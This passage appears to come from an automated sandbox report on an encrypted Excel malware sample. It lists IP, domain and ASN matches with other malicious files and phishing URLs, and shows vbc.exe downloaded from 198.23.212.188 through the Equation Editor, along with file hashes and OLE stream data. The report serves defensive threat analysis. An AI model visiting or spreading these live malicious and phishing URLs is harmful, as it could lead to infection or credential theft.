	Order List.xlsx	Get hash	malicious	Browse	198.23.212.188/reg/vbc.exe
34.102.136.180	Shipping INVOICE-BL Shipment..exe	Get hash	malicious	Browse	www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0
	PO98765.exe	Get hash	malicious	Browse	www.westhighlandwaytours.com/sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz
	Booking Confirmation.xlsx	Get hash	malicious	Browse	www.setyourhead.com/kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll
	PI202009255687.xlsx	Get hash	malicious	Browse	www.lygosfilms.info/ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2
	VOMAXTRADING.doc	Get hash	malicious	Browse	www.mycapecrusade.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA==
	purchase order.exe	Get hash	malicious	Browse	www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp
	inv.exe	Get hash	malicious	Browse	www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4
	anthon.exe	Get hash	malicious	Browse	www.stlmache.com/94sb/?D8c=zlihirZ0hdZXaD&8pdPSNhX=oHhCnRhAqLFON9zTJDssyW7Qcc6qw5o0Z4654po5P9rAmpqiU8ijSaSHb7UixrcmwTy4
	RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse	www.messianicentertainment.com/mkv/
	Scan 25112020 pdf.exe	Get hash	malicious	Browse	www.youarecoveredamerica.com/cxs/?wR=30eviFukjpDMKdZAPLSN5kaysTzlcADcsOyOixR0/60FoTO0nFa3+4ZYvhmf8uIzSvTf&V4=inHXwbhx
	PO EME39134.xlsx	Get hash	malicious	Browse	www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx
	PRODUCT INQUIRY BNQ1.xlsx	Get hash	malicious	Browse	www.d2cbox.com/coz3/?RFN4=Db4oM/0ZSLcS2WrsSk0EAPitYAH7G5kPXSBsu1Ti9XYpj/EUmwYzXG6I+6XEGkDvXHlCmg==&RB=NL00JzKhBv9HkNRp
	Document Required.xlsx	Get hash	malicious	Browse	www.vegbydesign.net/et2d/?LDHDp=V0L4Gg8XEG33noZ7KcimyECCbO7JKaiXnbIiZHmOm/4B4fbkqB2G6gSUl7eOq1VGLYG7cQ==&1bY8l=ktg8tf6PjX7
	Payment - Swift Copy.exe	Get hash	malicious	Browse	www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
	Shipment Document BLINV And Packing List Attached.exe	Get hash	malicious	Browse	www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
	SR7UzD8vSg.exe	Get hash	malicious	Browse	www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
	fSBya4AvVj.exe	Get hash	malicious	Browse	www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
	7OKYiP6gHy.exe	Get hash	malicious	Browse	www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
	ptFIhqUe89.exe	Get hash	malicious	Browse	www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
	G1K3UzwJBx.exe	Get hash	malicious	Browse	www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
reachlocal.cloudbackend.net	7New PO's 3.exe	Get hash	malicious	Browse	104.130.255.68
reachlocal.cloudbackend.net	59New PO's 3319971.exe	Get hash	malicious	Browse	104.130.255.68

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG	Quotation BID for FLORADYE-897498-sn-479873.exe	Get hash	malicious	Browse	119.31.235.105
	Quotation BID for FLORADYE-7875657875sn789894.exe	Get hash	malicious	Browse	119.31.235.105
	https://jiji.sg/modules/33338888/kutxacc/d8d1c4c534e3fbc/login.php?error=1&#_430cec0a06f011877	Get hash	malicious	Browse	101.100.201.17
	ORDER...08312020.exe	Get hash	malicious	Browse	111.235.136.11
	aAz6J4ZdUpY0h3s.exe	Get hash	malicious	Browse	111.235.136.11
	Order.exe	Get hash	malicious	Browse	111.235.136.11
	https://netorg5311404-my.sharepoint.com/:b:/g/personal/andrea_qualityprocessing_info/EU-DL-xouWZDquK3qv92wvwBIcu9lc-F04jNh2b57Qd8OA?at=9&e=4%3a0LgAJF	Get hash	malicious	Browse	101.100.216.158
	https://ssosscast.com/onmicrosoft/onedrive000	Get hash	malicious	Browse	101.100.216.158
	1.12.2018.js	Get hash	malicious	Browse	101.100.216.152
	1.12.2018.js	Get hash	malicious	Browse	101.100.216.152
	430#U0437.js	Get hash	malicious	Browse	101.100.216.152
	430#U0437.js	Get hash	malicious	Browse	101.100.216.152
	43som_output3492B3.exe	Get hash	malicious	Browse	101.100.210.100
	9SOA-XPF-9009016.PDF.exe	Get hash	malicious	Browse	101.100.210.100
	41payment invoic.exe	Get hash	malicious	Browse	111.235.137.94
	13Enquiry List.exe	Get hash	malicious	Browse	103.11.190.165
	42RFQ Requirements for IPREN BV Belgium.exe	Get hash	malicious	Browse	103.11.189.189
GOOGLEUS	https://ptfsca-my.sharepoint.com/:b:/g/personal/kevin_ptfs_ca/EboJWCmd9RVCrP7-u8pvAqYBYBaOrLxrf1qbZLFVjshCAA?e=4%3aaaD17Q&at=9	Get hash	malicious	Browse	216.58.215.225
	https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D	Get hash	malicious	Browse	172.217.168.20
	http://45.146.165.216	Get hash	malicious	Browse	172.217.22.98
	Shipping INVOICE-BL Shipment..exe	Get hash	malicious	Browse	34.102.136.180
	2zv940v7.dll	Get hash	malicious	Browse	216.58.215.225
	zojNE48815.apk	Get hash	malicious	Browse	8.8.4.4
	ANGEBOTXANFORDERNXXXXXXXXX26-11-2020.ppt	Get hash	malicious	Browse	172.217.168.1
	http://nity.midlidl.com/index	Get hash	malicious	Browse	216.58.206.1
	https://agjwxdkpqlmqklurjaovxhcdfc-dot-gloff00403993445.uk.r.appspot.com/#kynan.doha@fordway.com&data=04\|01\|kynan.doha@fordway.com\|e82b1ab95d564094873f08d891edc7dc\|92f571261c684e5180855cb2e14cc381\|1\|0\|637419797746769194\|Unknown\|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=\|1000&sdata=ZTxemzXa/xUx+Bg3lTShaT+EzejxRYLSPxP6RLnzsM0=&reserved=0	Get hash	malicious	Browse	172.217.168.84
	https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D	Get hash	malicious	Browse	172.217.168.52
	http://pma.climabitus.com/undercook.php	Get hash	malicious	Browse	216.58.215.225
	https://brechi5.wixsite.com/owa-webmail-updates	Get hash	malicious	Browse	216.58.212.162
	PO98765.exe	Get hash	malicious	Browse	34.102.136.180
	Booking Confirmation.xlsx	Get hash	malicious	Browse	34.102.136.180
	PI202009255687.xlsx	Get hash	malicious	Browse	34.102.136.180
	VOMAXTRADING.doc	Get hash	malicious	Browse	34.102.136.180
	ACCOUNT TEAM.ppt	Get hash	malicious	Browse	172.217.168.1
	purchase order.exe	Get hash	malicious	Browse	34.102.136.180
	inv.exe	Get hash	malicious	Browse	34.102.136.180
	http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3D	Get hash	malicious	Browse	172.217.168.84
RMH-14US	http://www.marketingprofs.com/images/email/7C84B0C9B698F30F466A07D02BBC03833022287036FD27DE94AC9E784E55BE26F82BCF9823CED845F9EB7678AC4BF8712C8706717C1D9550A8908F3EBB5048467449316403F75F7046CC9031D19F9D65/lgor.gif	Get hash	malicious	Browse	72.3.191.176
	http://mail.wwip.com	Get hash	malicious	Browse	166.78.154.137
	http://q5sxv.info/XNsp8N34Lx	Get hash	malicious	Browse	23.253.76.142
	chrisx.exe	Get hash	malicious	Browse	162.209.66.24
	http://174.143.146.246/~cosmo/vfghv.html	Get hash	malicious	Browse	174.143.146.246
	http://rs112.zol.co.zw	Get hash	malicious	Browse	66.216.86.92
	c7dh0AJEXM.exe	Get hash	malicious	Browse	23.253.126.58
	https://kmwconstruction.com/	Get hash	malicious	Browse	174.143.65.160
	http://kmwconstruction.com	Get hash	malicious	Browse	174.143.65.160
AS-COLOCROSSINGUS	EME_PO.47563.xlsx	Get hash	malicious	Browse	192.227.129.22
	Shipping documents.xlsx	Get hash	malicious	Browse	216.170.126.121
	document-2009439254.xls	Get hash	malicious	Browse	198.46.155.18
	document-2009439254.xls	Get hash	malicious	Browse	198.46.155.18
	document-1940099967.xls	Get hash	malicious	Browse	198.46.155.18
	document-1940099967.xls	Get hash	malicious	Browse	198.46.155.18
	document-2020425077.xls	Get hash	malicious	Browse	198.46.155.18
	document-2020425077.xls	Get hash	malicious	Browse	198.46.155.18
	document-1851433106.xls	Get hash	malicious	Browse	198.23.156.170
	document-1851433106.xls	Get hash	malicious	Browse	198.23.156.170
	document-1959916382.xls	Get hash	malicious	Browse	198.23.156.170
	document-1959916382.xls	Get hash	malicious	Browse	198.23.156.170
	document-2078943362.xls	Get hash	malicious	Browse	198.46.155.18
	document-1999796651.xls	Get hash	malicious	Browse	198.46.155.18
	document-2078943362.xls	Get hash	malicious	Browse	198.46.155.18
	document-1999796651.xls	Get hash	malicious	Browse	198.46.155.18
	document-189497319.xls	Get hash	malicious	Browse	198.23.156.170
	document-2004587833.xls	Get hash	malicious	Browse	198.23.156.170
	document-189497319.xls	Get hash	malicious	Browse	198.23.156.170
	document-184003024.xls	Get hash	malicious	Browse	198.23.156.170

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	498176
Entropy (8bit):	7.4283796959793
Encrypted:	false
SSDEEP:	12288:zEEoEPCriH+klc6VMJ8sntRqM6V9i2gt8LF:OCKR67PE8
MD5:	DA5CE3FE1991B9ACEF3B0BEEC210EE9F
SHA1:	BB8C5001A1BB6087F9F36982C2A874ED9A802FE8
SHA-256:	483E1E8DC1D5E311AA8B11EFF1935721301ED7959E7868CDF60C101C02CCCEF3
SHA-512:	87A6F9D2D8EDE414DDE4062BAC5A6E34E7D6D2DA53BC78A61B627C09049B381344EDCFBA359019C94C6CC7CBA09359AA317AE3632251D11F212D96E8F34C6D39
Malicious:	true
Reputation:	low
IE Cache URL:	http://198.23.212.188/reg/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$._..............0.............&.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......H................................................................0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3...s....}.....~....}.....(.......(......0.............(........(.......................0..4........r...p(.............s....}........{......(....}....:..{....(....&..0..................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3396111E.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EAFAC90.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.015295237077334
Encrypted:	false
SSDEEP:	3072:7Xtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:hahIFdyiaT2qtXw
MD5:	7AF585729C966E2395597B18AEF0177A
SHA1:	757785E38BD2CA2A0E1DA732CA6B62A48A4E7F51
SHA-256:	9BD5BD87CA837570E77954C7E1C9249C06EF7273192431ECF65CC27E2DD27D14
SHA-512:	617E135AC807B848CF9575D2373E8A63C83B138301036B52D37C59873B77A931C62B9AAC38FDC8F7E52B69C3C690324AA6FB7153D325B36BBDCCF4B90546D1BC
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................).,.).......)...)..N.Q..)...).......).t.)..N.Q..)...). ....yTP..)...). .........M..zTP............................................X...%...7...................{ .@................C.a.l.i.b.r...............).X.....)...)..2MP..........)...)..{KP.... .)...M.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BD2351.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\Desktop\~$P. I.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	7.4283796959793
Encrypted:	false
SSDEEP:	12288:zEEoEPCriH+klc6VMJ8sntRqM6V9i2gt8LF:OCKR67PE8
MD5:	DA5CE3FE1991B9ACEF3B0BEEC210EE9F
SHA1:	BB8C5001A1BB6087F9F36982C2A874ED9A802FE8
SHA-256:	483E1E8DC1D5E311AA8B11EFF1935721301ED7959E7868CDF60C101C02CCCEF3
SHA-512:	87A6F9D2D8EDE414DDE4062BAC5A6E34E7D6D2DA53BC78A61B627C09049B381344EDCFBA359019C94C6CC7CBA09359AA317AE3632251D11F212D96E8F34C6D39
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$._..............0.............&.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......H................................................................0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3...s....}.....~....}.....(.......(......0.............(........(.......................0..4........r...p(.............s....}........{......(....}....:..{....(....&..0..................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.962137270540166
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	P. I.xlsx
File size:	201728
MD5:	8600b18fcd47eb7a8708abdfd7266a88
SHA1:	6a7b0f2d86d7be943fc52c66156f7d3849c561ab
SHA256:	06aa501a864eff9930c64b5d9ac9ce52f947b0f993615823828d2a57c41f833a
SHA512:	66a8d2cf252ba259daf0fe952d6f17f55b65674e012933730a6a709199c5fc6b56cd08960f692787f15e826e0bea9d9d32d792eb16e997d29167cca5d7f21d41
SSDEEP:	6144:PjpBJ67+2MVkI6i1ZPr2r5d8SH9gZSV4deQqyJtayOI:bbJ65CjCdlHnVZQqAVZ
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "P. I.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 194664

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	194664
Entropy:	7.99850778936
Base64 Encoded:	True
